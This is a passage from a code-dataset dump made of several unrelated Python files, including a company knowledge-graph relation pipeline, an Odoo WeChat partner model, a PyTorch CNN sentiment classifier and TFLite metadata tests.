logging.getLogger().addHandler(file_log_handler)\n\nclass RelationPipeline(object):\n\n def __init__(self):\n\n self.config = configparser.ConfigParser()\n self.config.read(config_path)\n self.arango_con = ArangoConnection(arangoURL=self.config.get(\"arango\",\"arango_url\"),username= self.config.get(\"arango\",\"user\"),password=self.config.get(\"arango\",\"passwd\"))\n self.arango_db = self.arango_con[self.config.get(\"arango\",\"db\")]\n self.kb_company = self.arango_db[self.config.get(\"arango\",\"kb_company\")]\n self.industry_url = self.config.get(\"url\",\"company_classifier\")\n self._init_division_schema() # init division_schema from mysql\n self._init_industry_schema()\n self.count_graph_update = 0 # arango更新关系数据数量\n self.total = 0 # 处理日期总共需要添加关系的数量\n\n def _init_division_schema(self):\n '''\n 行政区域实体关系加载\n '''\n self.division_schema = {}\n sql_conn = pymysql.connect( host = self.config.get(\"mysql\",\"host\") ,\n user = self.config.get(\"mysql\",\"user\") ,\n passwd = self.config.get(\"mysql\",\"passwd\"),\n port = self.config.getint(\"mysql\",\"port\") ,\n db = self.config.get(\"mysql\",\"db\"),\n charset = \"utf8\" )\n sql_cur = sql_conn.cursor() \n\n # 初始化行政区域的关系schema\n sql_query_industry = \"select name, id, level, parent_id from {}\".format(self.config.get(\"mysql\",\"res_division\"))\n sql_cur.execute(sql_query_industry)\n divisions = sql_cur.fetchall()\n for division in divisions:\n division_name, division_id, division_level, division_parent_id = division\n self.division_schema[division_name] = {\n \"relation_type\":\"concept_relation/100004\",\n \"object_name\":division_name,\n \"object_type\": \"division\",\n \"object_id\": division_id\n }\n\n sql_cur.close()\n sql_conn.close()\n logger.info(\"MYSQL division schema 加载完成\")\n\n def _init_industry_schema(self):\n '''\n init loading industry schema at mysql res_industry table\n '''\n self.industry_schema = {}\n sql_conn = pymysql.connect( host = self.config.get(\"mysql\",\"host\") ,\n user = self.config.get(\"mysql\",\"user\") ,\n passwd = self.config.get(\"mysql\",\"passwd\"),\n port = self.config.getint(\"mysql\",\"port\") ,\n db = self.config.get(\"mysql\",\"db\"),\n charset = \"utf8\" )\n sql_cur = sql_conn.cursor() \n\n ###################################################################\n self.all_industries = [\"生物制药\",\"医疗器械\"]#设置需要单个或多个更新的产业分类\n ###################################################################\n self.update_industries_id = []\n # 初始化产业/产业领域 schema\n sql_query_industry = \"select name, id, parent_id from {}\".format(self.config.get(\"mysql\",\"res_industry\"))\n sql_cur.execute(sql_query_industry)\n labels = sql_cur.fetchall()\n for industry in labels:\n industry_name, industry_id, parent_id = industry\n self.industry_schema[industry_id] = {\n \"relation_type\":\"concept_relation/100011\",\n \"object_name\":industry_name,\n \"object_type\": \"industry\",\n \"object_id\": industry_id,\n \"object_parent_id\": parent_id\n }\n if industry_name in self.all_industries:\n self.update_industries_id.append(industry_id)\n\n sql_cur.close()\n sql_conn.close()\n logger.info(\"MYSQL industry schema 加载完成\")\n\n\n\n def get_related_industry_tags(self, industry_id):\n '''\n 根据子领域名称递归返回领域及所有父领域标签\n '''\n relations = []\n # 过滤招商领域与图谱定义不一致的\n if not industry_id in self.industry_schema:\n return relations\n \n relations.append(self.industry_schema[industry_id])\n parent_id = self.industry_schema[industry_id][\"object_parent_id\"]\n while (parent_id):\n node = self.industry_schema[parent_id]\n relations.append(node)\n parent_id = node[\"object_parent_id\"]\n return relations\n\n\n def query_process_company(self, process_date):\n \n if process_date == \"yesterday\":\n process_date = (datetime.date.today() - datetime.timedelta(days=1)).strftime(\"%Y-%m-%d\")\n \n elif process_date == \"today\":\n process_date = datetime.today().strftime(\"%Y-%m-%d\")\n \n elif len(process_date.split(\"-\")) == 3:\n process_date = process_date\n \n else:\n raise Exception(\"无效参数\")\n \n self.process_date = process_date\n iso_date_str = process_date + 'T00:00:00+08:00'\n iso_date = parser.parse(iso_date_str)\n\n aql = \"FOR company IN {} filter company.create_time>='2020-04-24 12:57:37.408114' SORT company.create_time return company\".format(\n self.config.get(\"arango\",\"kb_company\"), iso_date) \n \n try:\n res = self.arango_db.fetch_list(aql)\n except AQLFetchError as e:\n '''没有查到数据时,fetch_list会抛出异常'''\n res = []\n logger.warn(\"Arango企业库没有查到数据\",e)\n\n self.total = len(res) \n logger.info(\"[{}],企业知识库查到待处理数据[{}]个\".format(process_date, self.total))\n return res\n\n\n def process_division_rel(self, properties):\n div_rel = []\n province = properties[\"province\"]\n city = properties[\"city\"]\n area = properties[\"area\"]\n\n if province and province in self.division_schema.keys():\n if province in [\"北京市\",\"上海市\",\"重庆市\",\"天津市\"]:\n province = province.replace(\"市\",\"\")\n div_rel.append(self.division_schema[province])\n\n if city and city in self.division_schema.keys():\n div_rel.append(self.division_schema[city])\n\n if area and area in self.division_schema.keys():\n div_rel.append(self.division_schema[area])\n\n return div_rel\n\n \n def process_industry_rel(self,properties):\n '''\n 产业领域标签ID化添加\n '''\n industry_tags = []\n\n industry_field_tags = []\n company = properties[\"name\"]\n #all_industries = [\"人工智能\",\"光电产业\",\"新能源汽车\",\"医疗器械\"]#2020-05-27up\n post_data = {\n \"company_list\": [ company ],\n \"industry_list\":self.all_industries\n }\n if not self.all_industries:#没有特殊指定产业,默认为全量\n post_data['industry_list'] = 'all'\n try:\n res = requests.post(self.industry_url, data=json.dumps(post_data))\n\n if res.status_code == 200:\n tags = res.json().get(\"body\")[0]\n industry_field_tags.extend(tags)\n logger.info(\"接口数据返回分类=[{}]\".format(industry_field_tags))\n\n except Exception as e:\n logging.error(\"获取公司产业领域失败,公司名=[{}],接口=[{}]\".format(company,self.industry_url),e)\n\n for field in industry_field_tags:\n for industry_node in self.get_related_industry_tags(field[\"id\"]):\n if industry_node not in industry_tags:\n industry_tags.append(industry_node)\n\n logger.info(\"添加所有产业领域关系=[{}]\".format(industry_tags))\n\n return industry_tags\n\n def process_channel_rel(self, properties):\n '''与渠道实体的关系添加'''\n channel_rel = []\n sql_conn = pymysql.connect( host = self.config.get(\"mysql\",\"host\") ,\n user = self.config.get(\"mysql\",\"user\") ,\n passwd = self.config.get(\"mysql\",\"passwd\"),\n port = self.config.getint(\"mysql\",\"port\") ,\n db = self.config.get(\"mysql\",\"db\"),\n charset = \"utf8\" )\n sql_cur = sql_conn.cursor() \n # 查询企业相关的渠道信息\n sql_state = self.config.get(\"mysql\",\"company_channel_query\").replace(\"eq\",\"=\").format(properties[\"name\"])\n sql_cur.execute(sql_state)\n datas = sql_cur.fetchall()\n for data in datas:\n company_name, channel_name, channel_id = data\n rel = {\n \"relation_type\":\"concept_relation/100010\",\n \"object_name\":channel_name,\n \"object_type\": \"channel\",\n \"object_id\": channel_id,\n }\n channel_rel.append(rel)\n\n sql_cur.close()\n sql_conn.close()\n return channel_rel\n\n\n \n\n def process_relations(self, properties):\n '''\n 手动更新全量公司所有产业领域分类\n '''\n relations = []\n\n industry_rel = self.process_industry_rel(properties)\n relations.extend(industry_rel)\n\n return relations\n\n def process_realtion_company(self, input_q):\n\n while input_q.empty() is not True:\n company = input_q.get()\n company_key = company[\"_key\"]\n \n relations = [] \n # 获取新的产业领域分类\n relations = self.process_relations(company[\"properties\"])\n try:\n doc = self.kb_company[company_key]\n old_relations = doc[\"relations\"]\n\n for relation in copy.deepcopy(old_relations):\n for obeject_id in self.update_industries_id:\n if object_id in relation[\"object_id\"]:#发现该分类或其子分类\n old_relations.remove(relation)\n # 更新合并新产业领域分类数据\n relations.extend(old_relations) \n doc[\"relations\"] = relations\n doc[\"update_time\"] = datetime.datetime.today()\n doc.save()\n self.count_graph_update += 1\n\n if self.count_graph_update % 100 == 0 or self.count_graph_update == self.total:\n logger.info('#'*60)\n logger.info(\"前[{}]家企业关系添加完成,还剩[{}]在队列中\".format(self.count_graph_update,input_q.qsize()))\n logger.info('#'*60)\n except Exception as e:\n logger.error(\"企业关系添加失败,企业名=[{}]\".format(company[\"name\"]))\n input_q.task_done()\n\n\n \n \n def process(self, scan_date):\n\n process_companys = self.query_process_company(scan_date)\n\n count = 0\n\n # arango数据库企业信息处理\n input_q = Queue()\n for company in process_companys:\n\n logger.info(\"处理企业关系,企业名=[{}]\".format(company[\"name\"]))\n\n input_q.put(company)\n count += 1\n logger.info(\"清洗库共找到企业{}个进入队列#################################\".format(count))\n for _ in range(4):\n thread = threading.Thread(target=self.process_realtion_company,args=(input_q,))\n thread.daemon = True # 随主线程退出而退出\n thread.start()\n \n logger.info(\"日期[{}]清洗库共找到企业{}个,arango企业库更新关系{}个\".format(\n self.process_date, self.total, self.count_graph_update))\n\nif __name__==\"__main__\":\n\n # 最早日期 2019-06-03\n\n rel = RelationPipeline()\n if len(sys.argv) > 1:\n rel.process(sys.argv[1])\n else:\n rel.process(\"yesterday\")\n","sub_path":"company/company_single_relation_refresh.py","file_name":"company_single_relation_refresh.py","file_ext":"py","file_size_in_byte":13486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"653125132","text":"# coding=utf-8\nimport logging\n\nfrom geopy.distance import vincenty\n\nfrom odoo import models, fields, api\n\n_logger = logging.getLogger(__name__)\n\n\nclass WXResPartner(models.Model):\n _inherit = 'res.partner'\n\n wxcorp_user_id = fields.Many2one('wx.corpuser', '关联企业号用户')\n wx_user_id = fields.Many2one('wx.user', '微信公众用户')\n wxlatitude = fields.Float('纬度', digits=(10, 7))\n wxlongitude = fields.Float('经度', digits=(10, 7))\n wxprecision = fields.Float('位置精度', digits=(10, 7))\n location_write_date = fields.Datetime(\"更新时间\", readonly=True)\n wx_address = fields.Char(u'地址', compute='_get_address')\n near_team = fields.Char(u'附近门店', compute='_get_near_team')\n\n @api.one\n def _get_near_team(self):\n _logger.info(self)\n\n @api.one\n def _get_address(self):\n # 获取用户位置\n from ..controllers import amapapi\n if self.wxlatitude and self.wxlongitude:\n wx_location = '%s,%s' % (self.wxlongitude, self.wxlatitude)\n convert_location = amapapi.coordinateconvert(self, wx_location)\n location = convert_location.split(';')[0] # 用户真实位置\n formatted_address = amapapi.geocoderegeo(self, location)\n if formatted_address:\n self.wx_address = formatted_address['formatted_address']\n newport_ri = (location.split(',')[1], location.split(',')[0])\n crm_team_pool = self.env['crm.team'].search([])\n search_read_new = []\n for crm_team in crm_team_pool:\n if crm_team.longitude != 0.0 or crm_team.longitude != 0.0:\n cleveland_oh = (crm_team.latitude, crm_team.longitude)\n pos_kilometers = vincenty(newport_ri, cleveland_oh).kilometers\n crm_team.distance = pos_kilometers\n search_read_new.append(crm_team)\n # _logger.info(\"门店与用户距离%s\" % pos_kilometers)\n if search_read_new:\n min_distance = (min(search_read_new, key=lambda dict: dict['distance']))\n self.near_team = '%s:距离%s公里' % (min_distance.street, min_distance.distance)\n _logger.info(\"获取门店信息\")\n\n # def _compute_im_status(self):\n # super(WXResPartner, self)._compute_im_status()\n\n def send_corp_msg(self, msg):\n from ..rpc import corp_client\n entry = corp_client.corpenv(self.env)\n mtype = msg[\"mtype\"]\n if mtype == \"text\":\n entry.client.message.send_text(entry.current_agent, self.wxcorp_user_id.userid, msg[\"content\"])\n if mtype == \"card\":\n entry.client.message.send_text_card(entry.current_agent, self.wxcorp_user_id.userid, msg['title'],\n msg['description'], msg['url'], btntxt=msg.get(\"btntxt\", \"详情\"))\n elif mtype == 'image':\n ret = entry.client.media.upload(mtype, msg['media_data'])\n entry.client.message.send_image(entry.current_agent, self.wxcorp_user_id.userid, ret['media_id'])\n elif mtype == 'voice':\n ret = entry.client.media.upload(mtype, msg['media_data'])\n entry.client.message.send_voice(entry.current_agent, self.wxcorp_user_id.userid, ret['media_id'])\n\n def get_corp_key(self):\n if self.wxcorp_user_id:\n return self.wxcorp_user_id.userid\n\n def get_wx_key(self):\n if self.wx_user_id:\n return self.wx_user_id.openid\n\n @api.multi\n def write(self, vals):\n resusers = super(WXResPartner, self).write(vals)\n if vals.get('wx_user_id') and self.user_ids.wx_user_id.id != vals.get('wx_user_id'):\n self.user_ids.wx_user_id = vals.get('wx_user_id')\n self.user_ids.wx_id = self.user_ids.wx_user_id.openid\n return resusers\n","sub_path":"e2yun_addons/odoo12/wx_tools/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"608885414","text":"# -*- coding:utf-8 -*-\nimport os.path\n#!/usr/bin/python3\n\nimport pymysql\n\ndb = pymysql.connect(\"localhost\",\"root\",\"krnick\",\"DataMining\",charset=\"utf8\" )\ncursor = db.cursor()\n\nfor dirPath, dirNames, fileNames in os.walk(\"./newkeyword\"):\n for filename in fileNames:\n if(filename.endswith(\".txt\")and filename!=\"words.txt\"):\n f=open(\"./newkeyword/\"+filename,'r')\n filecontent=str(f.read())\n f.close()\n print(filename)\n print(filecontent)\n\n cursor.execute('''INSERT INTO file(filename,content) VALUES (%s,%s)''',(filename,filecontent) )\n db.commit()\n\t\t\t\n","sub_path":"store_content.py","file_name":"store_content.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"113223454","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Author : Jan Yang\n@software: PyCharm Community Edition\n\"\"\"\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef test_webpage(url):\n \"\"\"测试网页访问情况,添加headers模拟浏览器\"\"\"\n # 创建请求头部信息\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36'}\n response = requests.get(url, headers=headers) # 添加headers进行请求\n # response = requests.get(url)\n soup = BeautifulSoup(response.text, 'lxml')\n\n print(response.status_code) # 打印状态码\n print(response.request.headers) # 打印请求请求头部\n print(soup.head.title.text) # 打印网页标题\n\n\nif __name__ == '__main__':\n test_webpage('http://blog.csdn.net/wswzjdez/article/details/5694942')\n # test_webpage('http://www.cec.com.cn/')\n","sub_path":"Python3/ch05/5.2-add_headers.py","file_name":"5.2-add_headers.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"271711241","text":"import argparse\nfrom math import ceil\nimport copy\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchtext\nfrom torchtext.vocab import Vectors, GloVe\nimport pdb\n\ntorch.manual_seed(42)\n\ndef validate(model, val_iter):\n correct, total = 0.0, 0.0\n for batch in val_iter:\n probs = model(batch.text.t_())\n _, argmax = probs.max(1)\n for i, predicted in enumerate(list(argmax.data)):\n if predicted+1 == batch.label[i].data[0]:\n correct += 1\n total += 1\n return correct / total\n\nclass CNN(nn.Module):\n\n def __init__(self, model=\"non-static\", vocab_size=None, embedding_dim=128, class_number=None,\n feature_maps=100, filter_windows=[3,4,5], dropout=0.5):\n super(CNN, self).__init__()\n\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.class_number = class_number\n self.filter_windows = filter_windows\n self.in_channel = 1\n self.out_channel = feature_maps\n self.model = model\n\n if model == \"static\":\n self.embedding.weight.requires_grad = False\n elif model == \"multichannel\":\n self.embedding2 = nn.Embedding(vocab_size+2, embedding_dim)\n self.embedding2.weight.requires_grad = False\n self.in_channel = 2\n\n self.embedding = nn.Embedding(vocab_size+2, embedding_dim)\n self.conv = nn.ModuleList([nn.Conv2d(self.in_channel, self.out_channel, (F, embedding_dim)) for F in filter_windows])\n self.dropout = nn.Dropout(dropout)\n self.fc = nn.Linear(len(filter_windows) * self.out_channel, 128)\n # self.fc1 = nn.Linear(len(filter_windows) * self.out_channel, 128) # Fully connected layer\n # self.fc2 = nn.Linear(128, 80)\n # self.fc3 = nn.Linear(80, class_number)\n\n def convolution_max_pool(self, inputs, convolution, i, max_sent_len):\n result_convolution = F.relu(convolution(inputs)).squeeze(3) # (batch_size, out_channel, max_seq_len)\n result = F.max_pool1d(result_convolution, result_convolution.size(2)).squeeze(2) # (batch_size, out_channel)\n return result\n\n def forward(self, inputs):\n # Pad inputs if less than filter window size\n if inputs.size()[1] <= max(self.filter_windows):\n inputs = F.pad(inputs, (1, ceil((max(self.filter_windows)-inputs.size()[1])/2))) # FINISH THIS PADDING\n \n max_sent_len = inputs.size(1)\n embedding = self.embedding(inputs) # (batch_size, max_seq_len, embedding_size)\n embedding = embedding.unsqueeze(1)\n\n if self.model == \"multichannel\":\n embedding2 = self.embedding2(inputs)\n embedding2 = embedding2.unsqueeze(1)\n embedding = torch.cat((embedding, embedding2), 1)\n \n result = [self.convolution_max_pool(embedding, k, i, max_sent_len) for i, k in enumerate(self.conv)]\n result = self.fc(self.dropout(torch.cat(result, 1)))\n # result = self.fc1(self.dropout(torch.cat(result, 1)))\n # result = F.relu(self.fc2(result))\n # result = F.relu(self.fc3(result))\n return result\n\nif __name__ == '__main__':\n # Our input $x$\n TEXT = torchtext.data.Field()\n # Our labels $y$\n LABEL = torchtext.data.Field(sequential=False)\n\n train, val, test = torchtext.datasets.SST.splits(\n TEXT, LABEL,\n filter_pred=lambda ex: ex.label != 'neutral')\n\n TEXT.build_vocab(train)\n LABEL.build_vocab(train)\n\n train_iter, val_iter, test_iter = torchtext.data.BucketIterator.splits(\n (train, val, test), batch_size=50, device=-1, repeat=False)\n\n # Build the vocabulary with word embeddings\n url = 'https://s3-us-west-1.amazonaws.com/fasttext-vectors/wiki.simple.vec'\n TEXT.vocab.load_vectors(vectors=Vectors('wiki.simple.vec', url=url))\n\n net = CNN(model='multichannel', vocab_size=len(TEXT.vocab), class_number=2)\n criterion = nn.CrossEntropyLoss()\n parameters = filter(lambda p: p.requires_grad, net.parameters())\n optimizer = optim.Adam(parameters, lr=0.00025)\n\n for epoch in range(50):\n total_loss = 0\n for batch in train_iter:\n text, label = batch.text.t_(), batch.label\n label = label - 1\n net.zero_grad()\n\n logit = net(text)\n loss = criterion(logit, label)\n loss.backward()\n nn.utils.clip_grad_norm(parameters, max_norm=3)\n optimizer.step()\n\n total_loss += loss.data\n print(str(epoch) + \" loss = \" + str(total_loss))\n\n print(\"VAL SET\", validate(net, val_iter))\n\n# TESTING\n\"All models should be able to be run with following command.\"\nupload = []\n# Update: for kaggle the bucket iterator needs to have batch_size 10\n# test_iter = torchtext.data.BucketIterator(test, train=False, batch_size=10, repeat=False)\ncorrect, total = 0.0, 0.0\nfor batch in test_iter:\n # Your prediction data here (don't cheat!)\n probs = net(batch.text.t_())\n _, argmax = probs.max(1)\n for i, predicted in enumerate(list(argmax.data)):\n if predicted+1 == batch.label[i].data[0]:\n correct += 1\n total += 1\n\n upload += list(argmax.data)\nprint(\"TEST SET:\", correct / total)\n# print(\"Upload: \", upload)\n\nwith open(\"predictions.txt\", \"w\") as f:\n for u in upload:\n f.write(str(u) + \"\\n\")\n","sub_path":"HW1/5_Extension.py","file_name":"5_Extension.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"2542671","text":"from random import randint\nfrom random import seed\nimport numpy as np\nseed(135)\n\nclass Reverser:\n\n def reverse(self, num):\n num_check = num if not isinstance(num, str) else bin_to_dec(num)\n if num_check < - 2**31 or num_check >= 2**31:\n return 0\n else:\n if(isinstance(num, str)):\n num_str = str(num)\n mult = ''\n if num_str[0] == '-':\n num_str = num_str[1:]\n mult = '-'\n return mult + (num_str[::-1])\n if(not isinstance(num, str)):\n num_str = str(num)\n mult = 1\n if num_str[0] == '-':\n num_str = num_str[1:]\n mult = -1\n return int(num_str[::-1]) * mult\n\n\ndef to_bits(num):\n return '{0:01b}'.format(num)\n\n\ndef bin_to_dec(num):\n if(not isinstance(num, str)): num = str(num)\n mult = 1\n if num[0] == '-':\n num = num[1:]\n mult = -1\n r_num = num[::-1]\n idxs = []\n for i in range(len(r_num)):\n if r_num[i] == '1':\n idxs.append(i)\n result = 0\n for i in idxs:\n result += 2**i\n return result * mult\n\n\ndef binary_sum(num1, num2):\n d_num1 = bin_to_dec(num1)\n d_num2 = bin_to_dec(num2)\n result = d_num1 + d_num2\n return to_bits(result)\n \na = []\nb = []\nc = []\n\ndim = 13\nfor i in range(dim):\n a.append(randint(-2**31, 2**31))\n\nr = Reverser()\nfor i in range(dim):\n b.append(r.reverse(a[i]))\n\nfor i in range(dim):\n c.append(r.reverse(b[i]))\nanswer_1_true = a[1]\nanswer_2_true = b[2]\nanswer_3_true = sum(np.array(a) != np.array(c) * 1.0)\nanswer_4_true = sum(np.array(c) == 0 * 1.0)\nanswer_5_true = r.reverse(binary_sum(to_bits(a[0]),to_bits(b[0])))\n\n\nprint(answer_1_true)\nprint(answer_2_true)\nprint(answer_3_true)\nprint(answer_4_true)\nprint(answer_5_true)\n","sub_path":"03_Implementacao/DataBase/true_or_false_question_32_bit_nums/full_program.py","file_name":"full_program.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"403770972","text":"\"\"\"\nCommands can be sent to spock in the format !command args from ingame chat\n\"\"\"\n__author__ = \"Morgan Creekmore\"\n__copyright__ = \"Copyright 2015, The SpockBot Project\"\n__license__ = \"MIT\"\n\nfrom spock.utils import string_types\n\nimport logging\nlogger = logging.getLogger('spock')\n\nclass ChatCommandPlugin:\n\tdef __init__(self, ploader, settings):\n\t\tself.event = ploader.requires('Event')\n\t\tploader.reg_event_handler(\n\t\t\t'PLAY List[str]:\n if ignored_attributes is None:\n ignored_attributes = {}\n return Stream(self.keys).filter(lambda attribute: attribute not in ignored_attributes).toList()\n\n def rows(self, *, ignored_attributes=None) -> np.array:\n columns = Stream(self.attributes(ignored_attributes=ignored_attributes)).map(\n lambda attribute: self.dataframe[attribute]).toList()\n matrix = np.array(columns).transpose()\n if self.row_limit > 0:\n return matrix[:self.row_limit]\n return matrix\n\n def column(self, attribute_name: str) -> np.array:\n if self.row_limit > 0:\n return np.array(self.dataframe[attribute_name][:self.row_limit])\n return np.array(self.dataframe[attribute_name])\n\n def column_transform(self, column_name: str, transformation: Callable) -> None:\n for i, element in enumerate(self.dataframe[column_name]):\n self.dataframe[column_name][i] = transformation(element)\n\n if i == self.row_limit:\n print(\"Reached row limit.\")\n break\n\n def add_column(self, column_name: str, row_creation_function: Callable) -> None:\n new_column = np.zeros(len(self.dataframe['Duration']))\n new_column += [row_creation_function(x) for x in self.rows()] + [x for x in range(self.row_limit, len(\n self.dataframe['Duration']))]\n self.dataframe = self.dataframe.assign(**{column_name: pd.Series(np.array(new_column)).values})\n self.keys.append(column_name)\n\n def filter_rows(self, query: str) -> \"DataframeTable\":\n \"\"\"Returns a new table containing only the matching rows.\"\"\"\n return DataframeTable(self.dataframe.query(query), row_limit=self.row_limit)\n\n","sub_path":"experiment_framework/infrastructure/data/dataframe_table.py","file_name":"dataframe_table.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"555235135","text":"# Copyright 2020 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Tests for metadata info classes.\"\"\"\n\nfrom absl.testing import parameterized\n\nimport tensorflow as tf\n\nimport flatbuffers\nfrom tensorflow_lite_support.metadata import metadata_schema_py_generated as _metadata_fb\nfrom tensorflow_lite_support.metadata import schema_py_generated as _schema_fb\nfrom tensorflow_lite_support.metadata.python import metadata as _metadata\nfrom tensorflow_lite_support.metadata.python.metadata_writers import metadata_info\nfrom tensorflow_lite_support.metadata.python.tests.metadata_writers import test_utils\n\n\nclass GeneralMdTest(tf.test.TestCase):\n\n _EXPECTED_GENERAL_META_JSON = \"../testdata/general_meta.json\"\n\n def test_create_metadata_should_succeed(self):\n general_md = metadata_info.GeneralMd(\n name=\"model\",\n version=\"v1\",\n description=\"A ML model.\",\n author=\"TensorFlow\",\n licenses=\"Apache\")\n general_metadata = general_md.create_metadata()\n\n # Create the Flatbuffers object and convert it to the json format.\n builder = flatbuffers.Builder(0)\n builder.Finish(\n general_metadata.Pack(builder),\n _metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)\n metadata_json = _metadata.convert_to_json(bytes(builder.Output()))\n\n expected_json = test_utils.load_file(self._EXPECTED_GENERAL_META_JSON, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\nclass AssociatedFileMdTest(tf.test.TestCase):\n\n _EXPECTED_META_JSON = \"../testdata/associated_file_meta.json\"\n\n def test_create_metadata_should_succeed(self):\n file_md = metadata_info.AssociatedFileMd(\n file_path=\"label.txt\",\n description=\"The label file.\",\n file_type=_metadata_fb.AssociatedFileType.TENSOR_AXIS_LABELS,\n locale=\"en\")\n file_metadata = file_md.create_metadata()\n\n # Create the Flatbuffers object and convert it to the json format.\n model_metadata = _metadata_fb.ModelMetadataT()\n model_metadata.associatedFiles = [file_metadata]\n builder = flatbuffers.Builder(0)\n builder.Finish(\n model_metadata.Pack(builder),\n _metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)\n metadata_json = _metadata.convert_to_json(bytes(builder.Output()))\n\n expected_json = test_utils.load_file(self._EXPECTED_META_JSON, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\nclass TensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n _TENSOR_NAME = \"input\"\n _TENSOR_DESCRIPTION = \"The input tensor.\"\n _TENSOR_MIN = 0\n _TENSOR_MAX = 1\n _LABEL_FILE_EN = \"labels.txt\"\n _LABEL_FILE_CN = \"labels_cn.txt\" # Locale label file in Chinese.\n _EXPECTED_FEATURE_TENSOR_JSON = \"../testdata/feature_tensor_meta.json\"\n _EXPECTED_IMAGE_TENSOR_JSON = \"../testdata/image_tensor_meta.json\"\n _EXPECTED_BOUNDING_BOX_TENSOR_JSON = \"../testdata/bounding_box_tensor_meta.json\"\n\n @parameterized.named_parameters(\n {\n \"testcase_name\": \"feature_tensor\",\n \"content_type\": _metadata_fb.ContentProperties.FeatureProperties,\n \"golden_json\": _EXPECTED_FEATURE_TENSOR_JSON\n }, {\n \"testcase_name\": \"image_tensor\",\n \"content_type\": _metadata_fb.ContentProperties.ImageProperties,\n \"golden_json\": _EXPECTED_IMAGE_TENSOR_JSON\n }, {\n \"testcase_name\": \"bounding_box_tensor\",\n \"content_type\": _metadata_fb.ContentProperties.BoundingBoxProperties,\n \"golden_json\": _EXPECTED_BOUNDING_BOX_TENSOR_JSON\n })\n def test_create_metadata_should_succeed(self, content_type, golden_json):\n associated_file1 = metadata_info.AssociatedFileMd(\n file_path=self._LABEL_FILE_EN, locale=\"en\")\n associated_file2 = metadata_info.AssociatedFileMd(\n file_path=self._LABEL_FILE_CN, locale=\"cn\")\n\n tensor_md = metadata_info.TensorMd(\n name=self._TENSOR_NAME,\n description=self._TENSOR_DESCRIPTION,\n min_values=[self._TENSOR_MIN],\n max_values=[self._TENSOR_MAX],\n content_type=content_type,\n associated_files=[associated_file1, associated_file2])\n tensor_metadata = tensor_md.create_metadata()\n\n metadata_json = _metadata.convert_to_json(\n _create_dummy_model_metadata(tensor_metadata))\n expected_json = test_utils.load_file(golden_json, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n\nclass InputImageTensorMdTest(tf.test.TestCase, parameterized.TestCase):\n\n _NAME = \"image\"\n _DESCRIPTION = \"The input image.\"\n _NORM_MEAN = (0, 127.5, 255)\n _NORM_STD = (127.5, 127.5, 127.5)\n _COLOR_SPACE_TYPE = _metadata_fb.ColorSpaceType.RGB\n _EXPECTED_FLOAT_TENSOR_JSON = \"../testdata/input_image_tensor_float_meta.json\"\n _EXPECTED_UINT8_TENSOR_JSON = \"../testdata/input_image_tensor_uint8_meta.json\"\n _EXPECTED_UNSUPPORTED_TENSOR_JSON = \"../testdata/input_image_tensor_unsupported_meta.json\"\n\n @parameterized.named_parameters(\n {\n \"testcase_name\": \"float\",\n \"tensor_type\": _schema_fb.TensorType.FLOAT32,\n \"golden_json\": _EXPECTED_FLOAT_TENSOR_JSON\n }, {\n \"testcase_name\": \"uint8\",\n \"tensor_type\": _schema_fb.TensorType.UINT8,\n \"golden_json\": _EXPECTED_UINT8_TENSOR_JSON\n }, {\n \"testcase_name\": \"unsupported_tensor_type\",\n \"tensor_type\": _schema_fb.TensorType.INT16,\n \"golden_json\": _EXPECTED_UNSUPPORTED_TENSOR_JSON\n })\n def test_create_metadata_should_succeed(self, tensor_type, golden_json):\n tesnor_md = metadata_info.InputImageTensorMd(\n name=self._NAME,\n description=self._DESCRIPTION,\n norm_mean=list(self._NORM_MEAN),\n norm_std=list(self._NORM_STD),\n color_space_type=self._COLOR_SPACE_TYPE,\n tensor_type=tensor_type)\n tensor_metadata = tesnor_md.create_metadata()\n\n metadata_json = _metadata.convert_to_json(\n _create_dummy_model_metadata(tensor_metadata))\n expected_json = test_utils.load_file(golden_json, \"r\")\n self.assertEqual(metadata_json, expected_json)\n\n def test_init_should_throw_exception_with_incompatible_mean_and_std(self):\n norm_mean = [0]\n norm_std = [1, 2]\n with self.assertRaises(ValueError) as error:\n metadata_info.InputImageTensorMd(norm_mean=norm_mean, norm_std=norm_std)\n # TODO(b/175843689): Python version cannot be specified in Kokoro bazel test\n self.assertEqual(\n \"norm_mean and norm_std are expected to be the same dim. But got \" +\n \"{} and {}\".format(len(norm_mean), len(norm_std)), 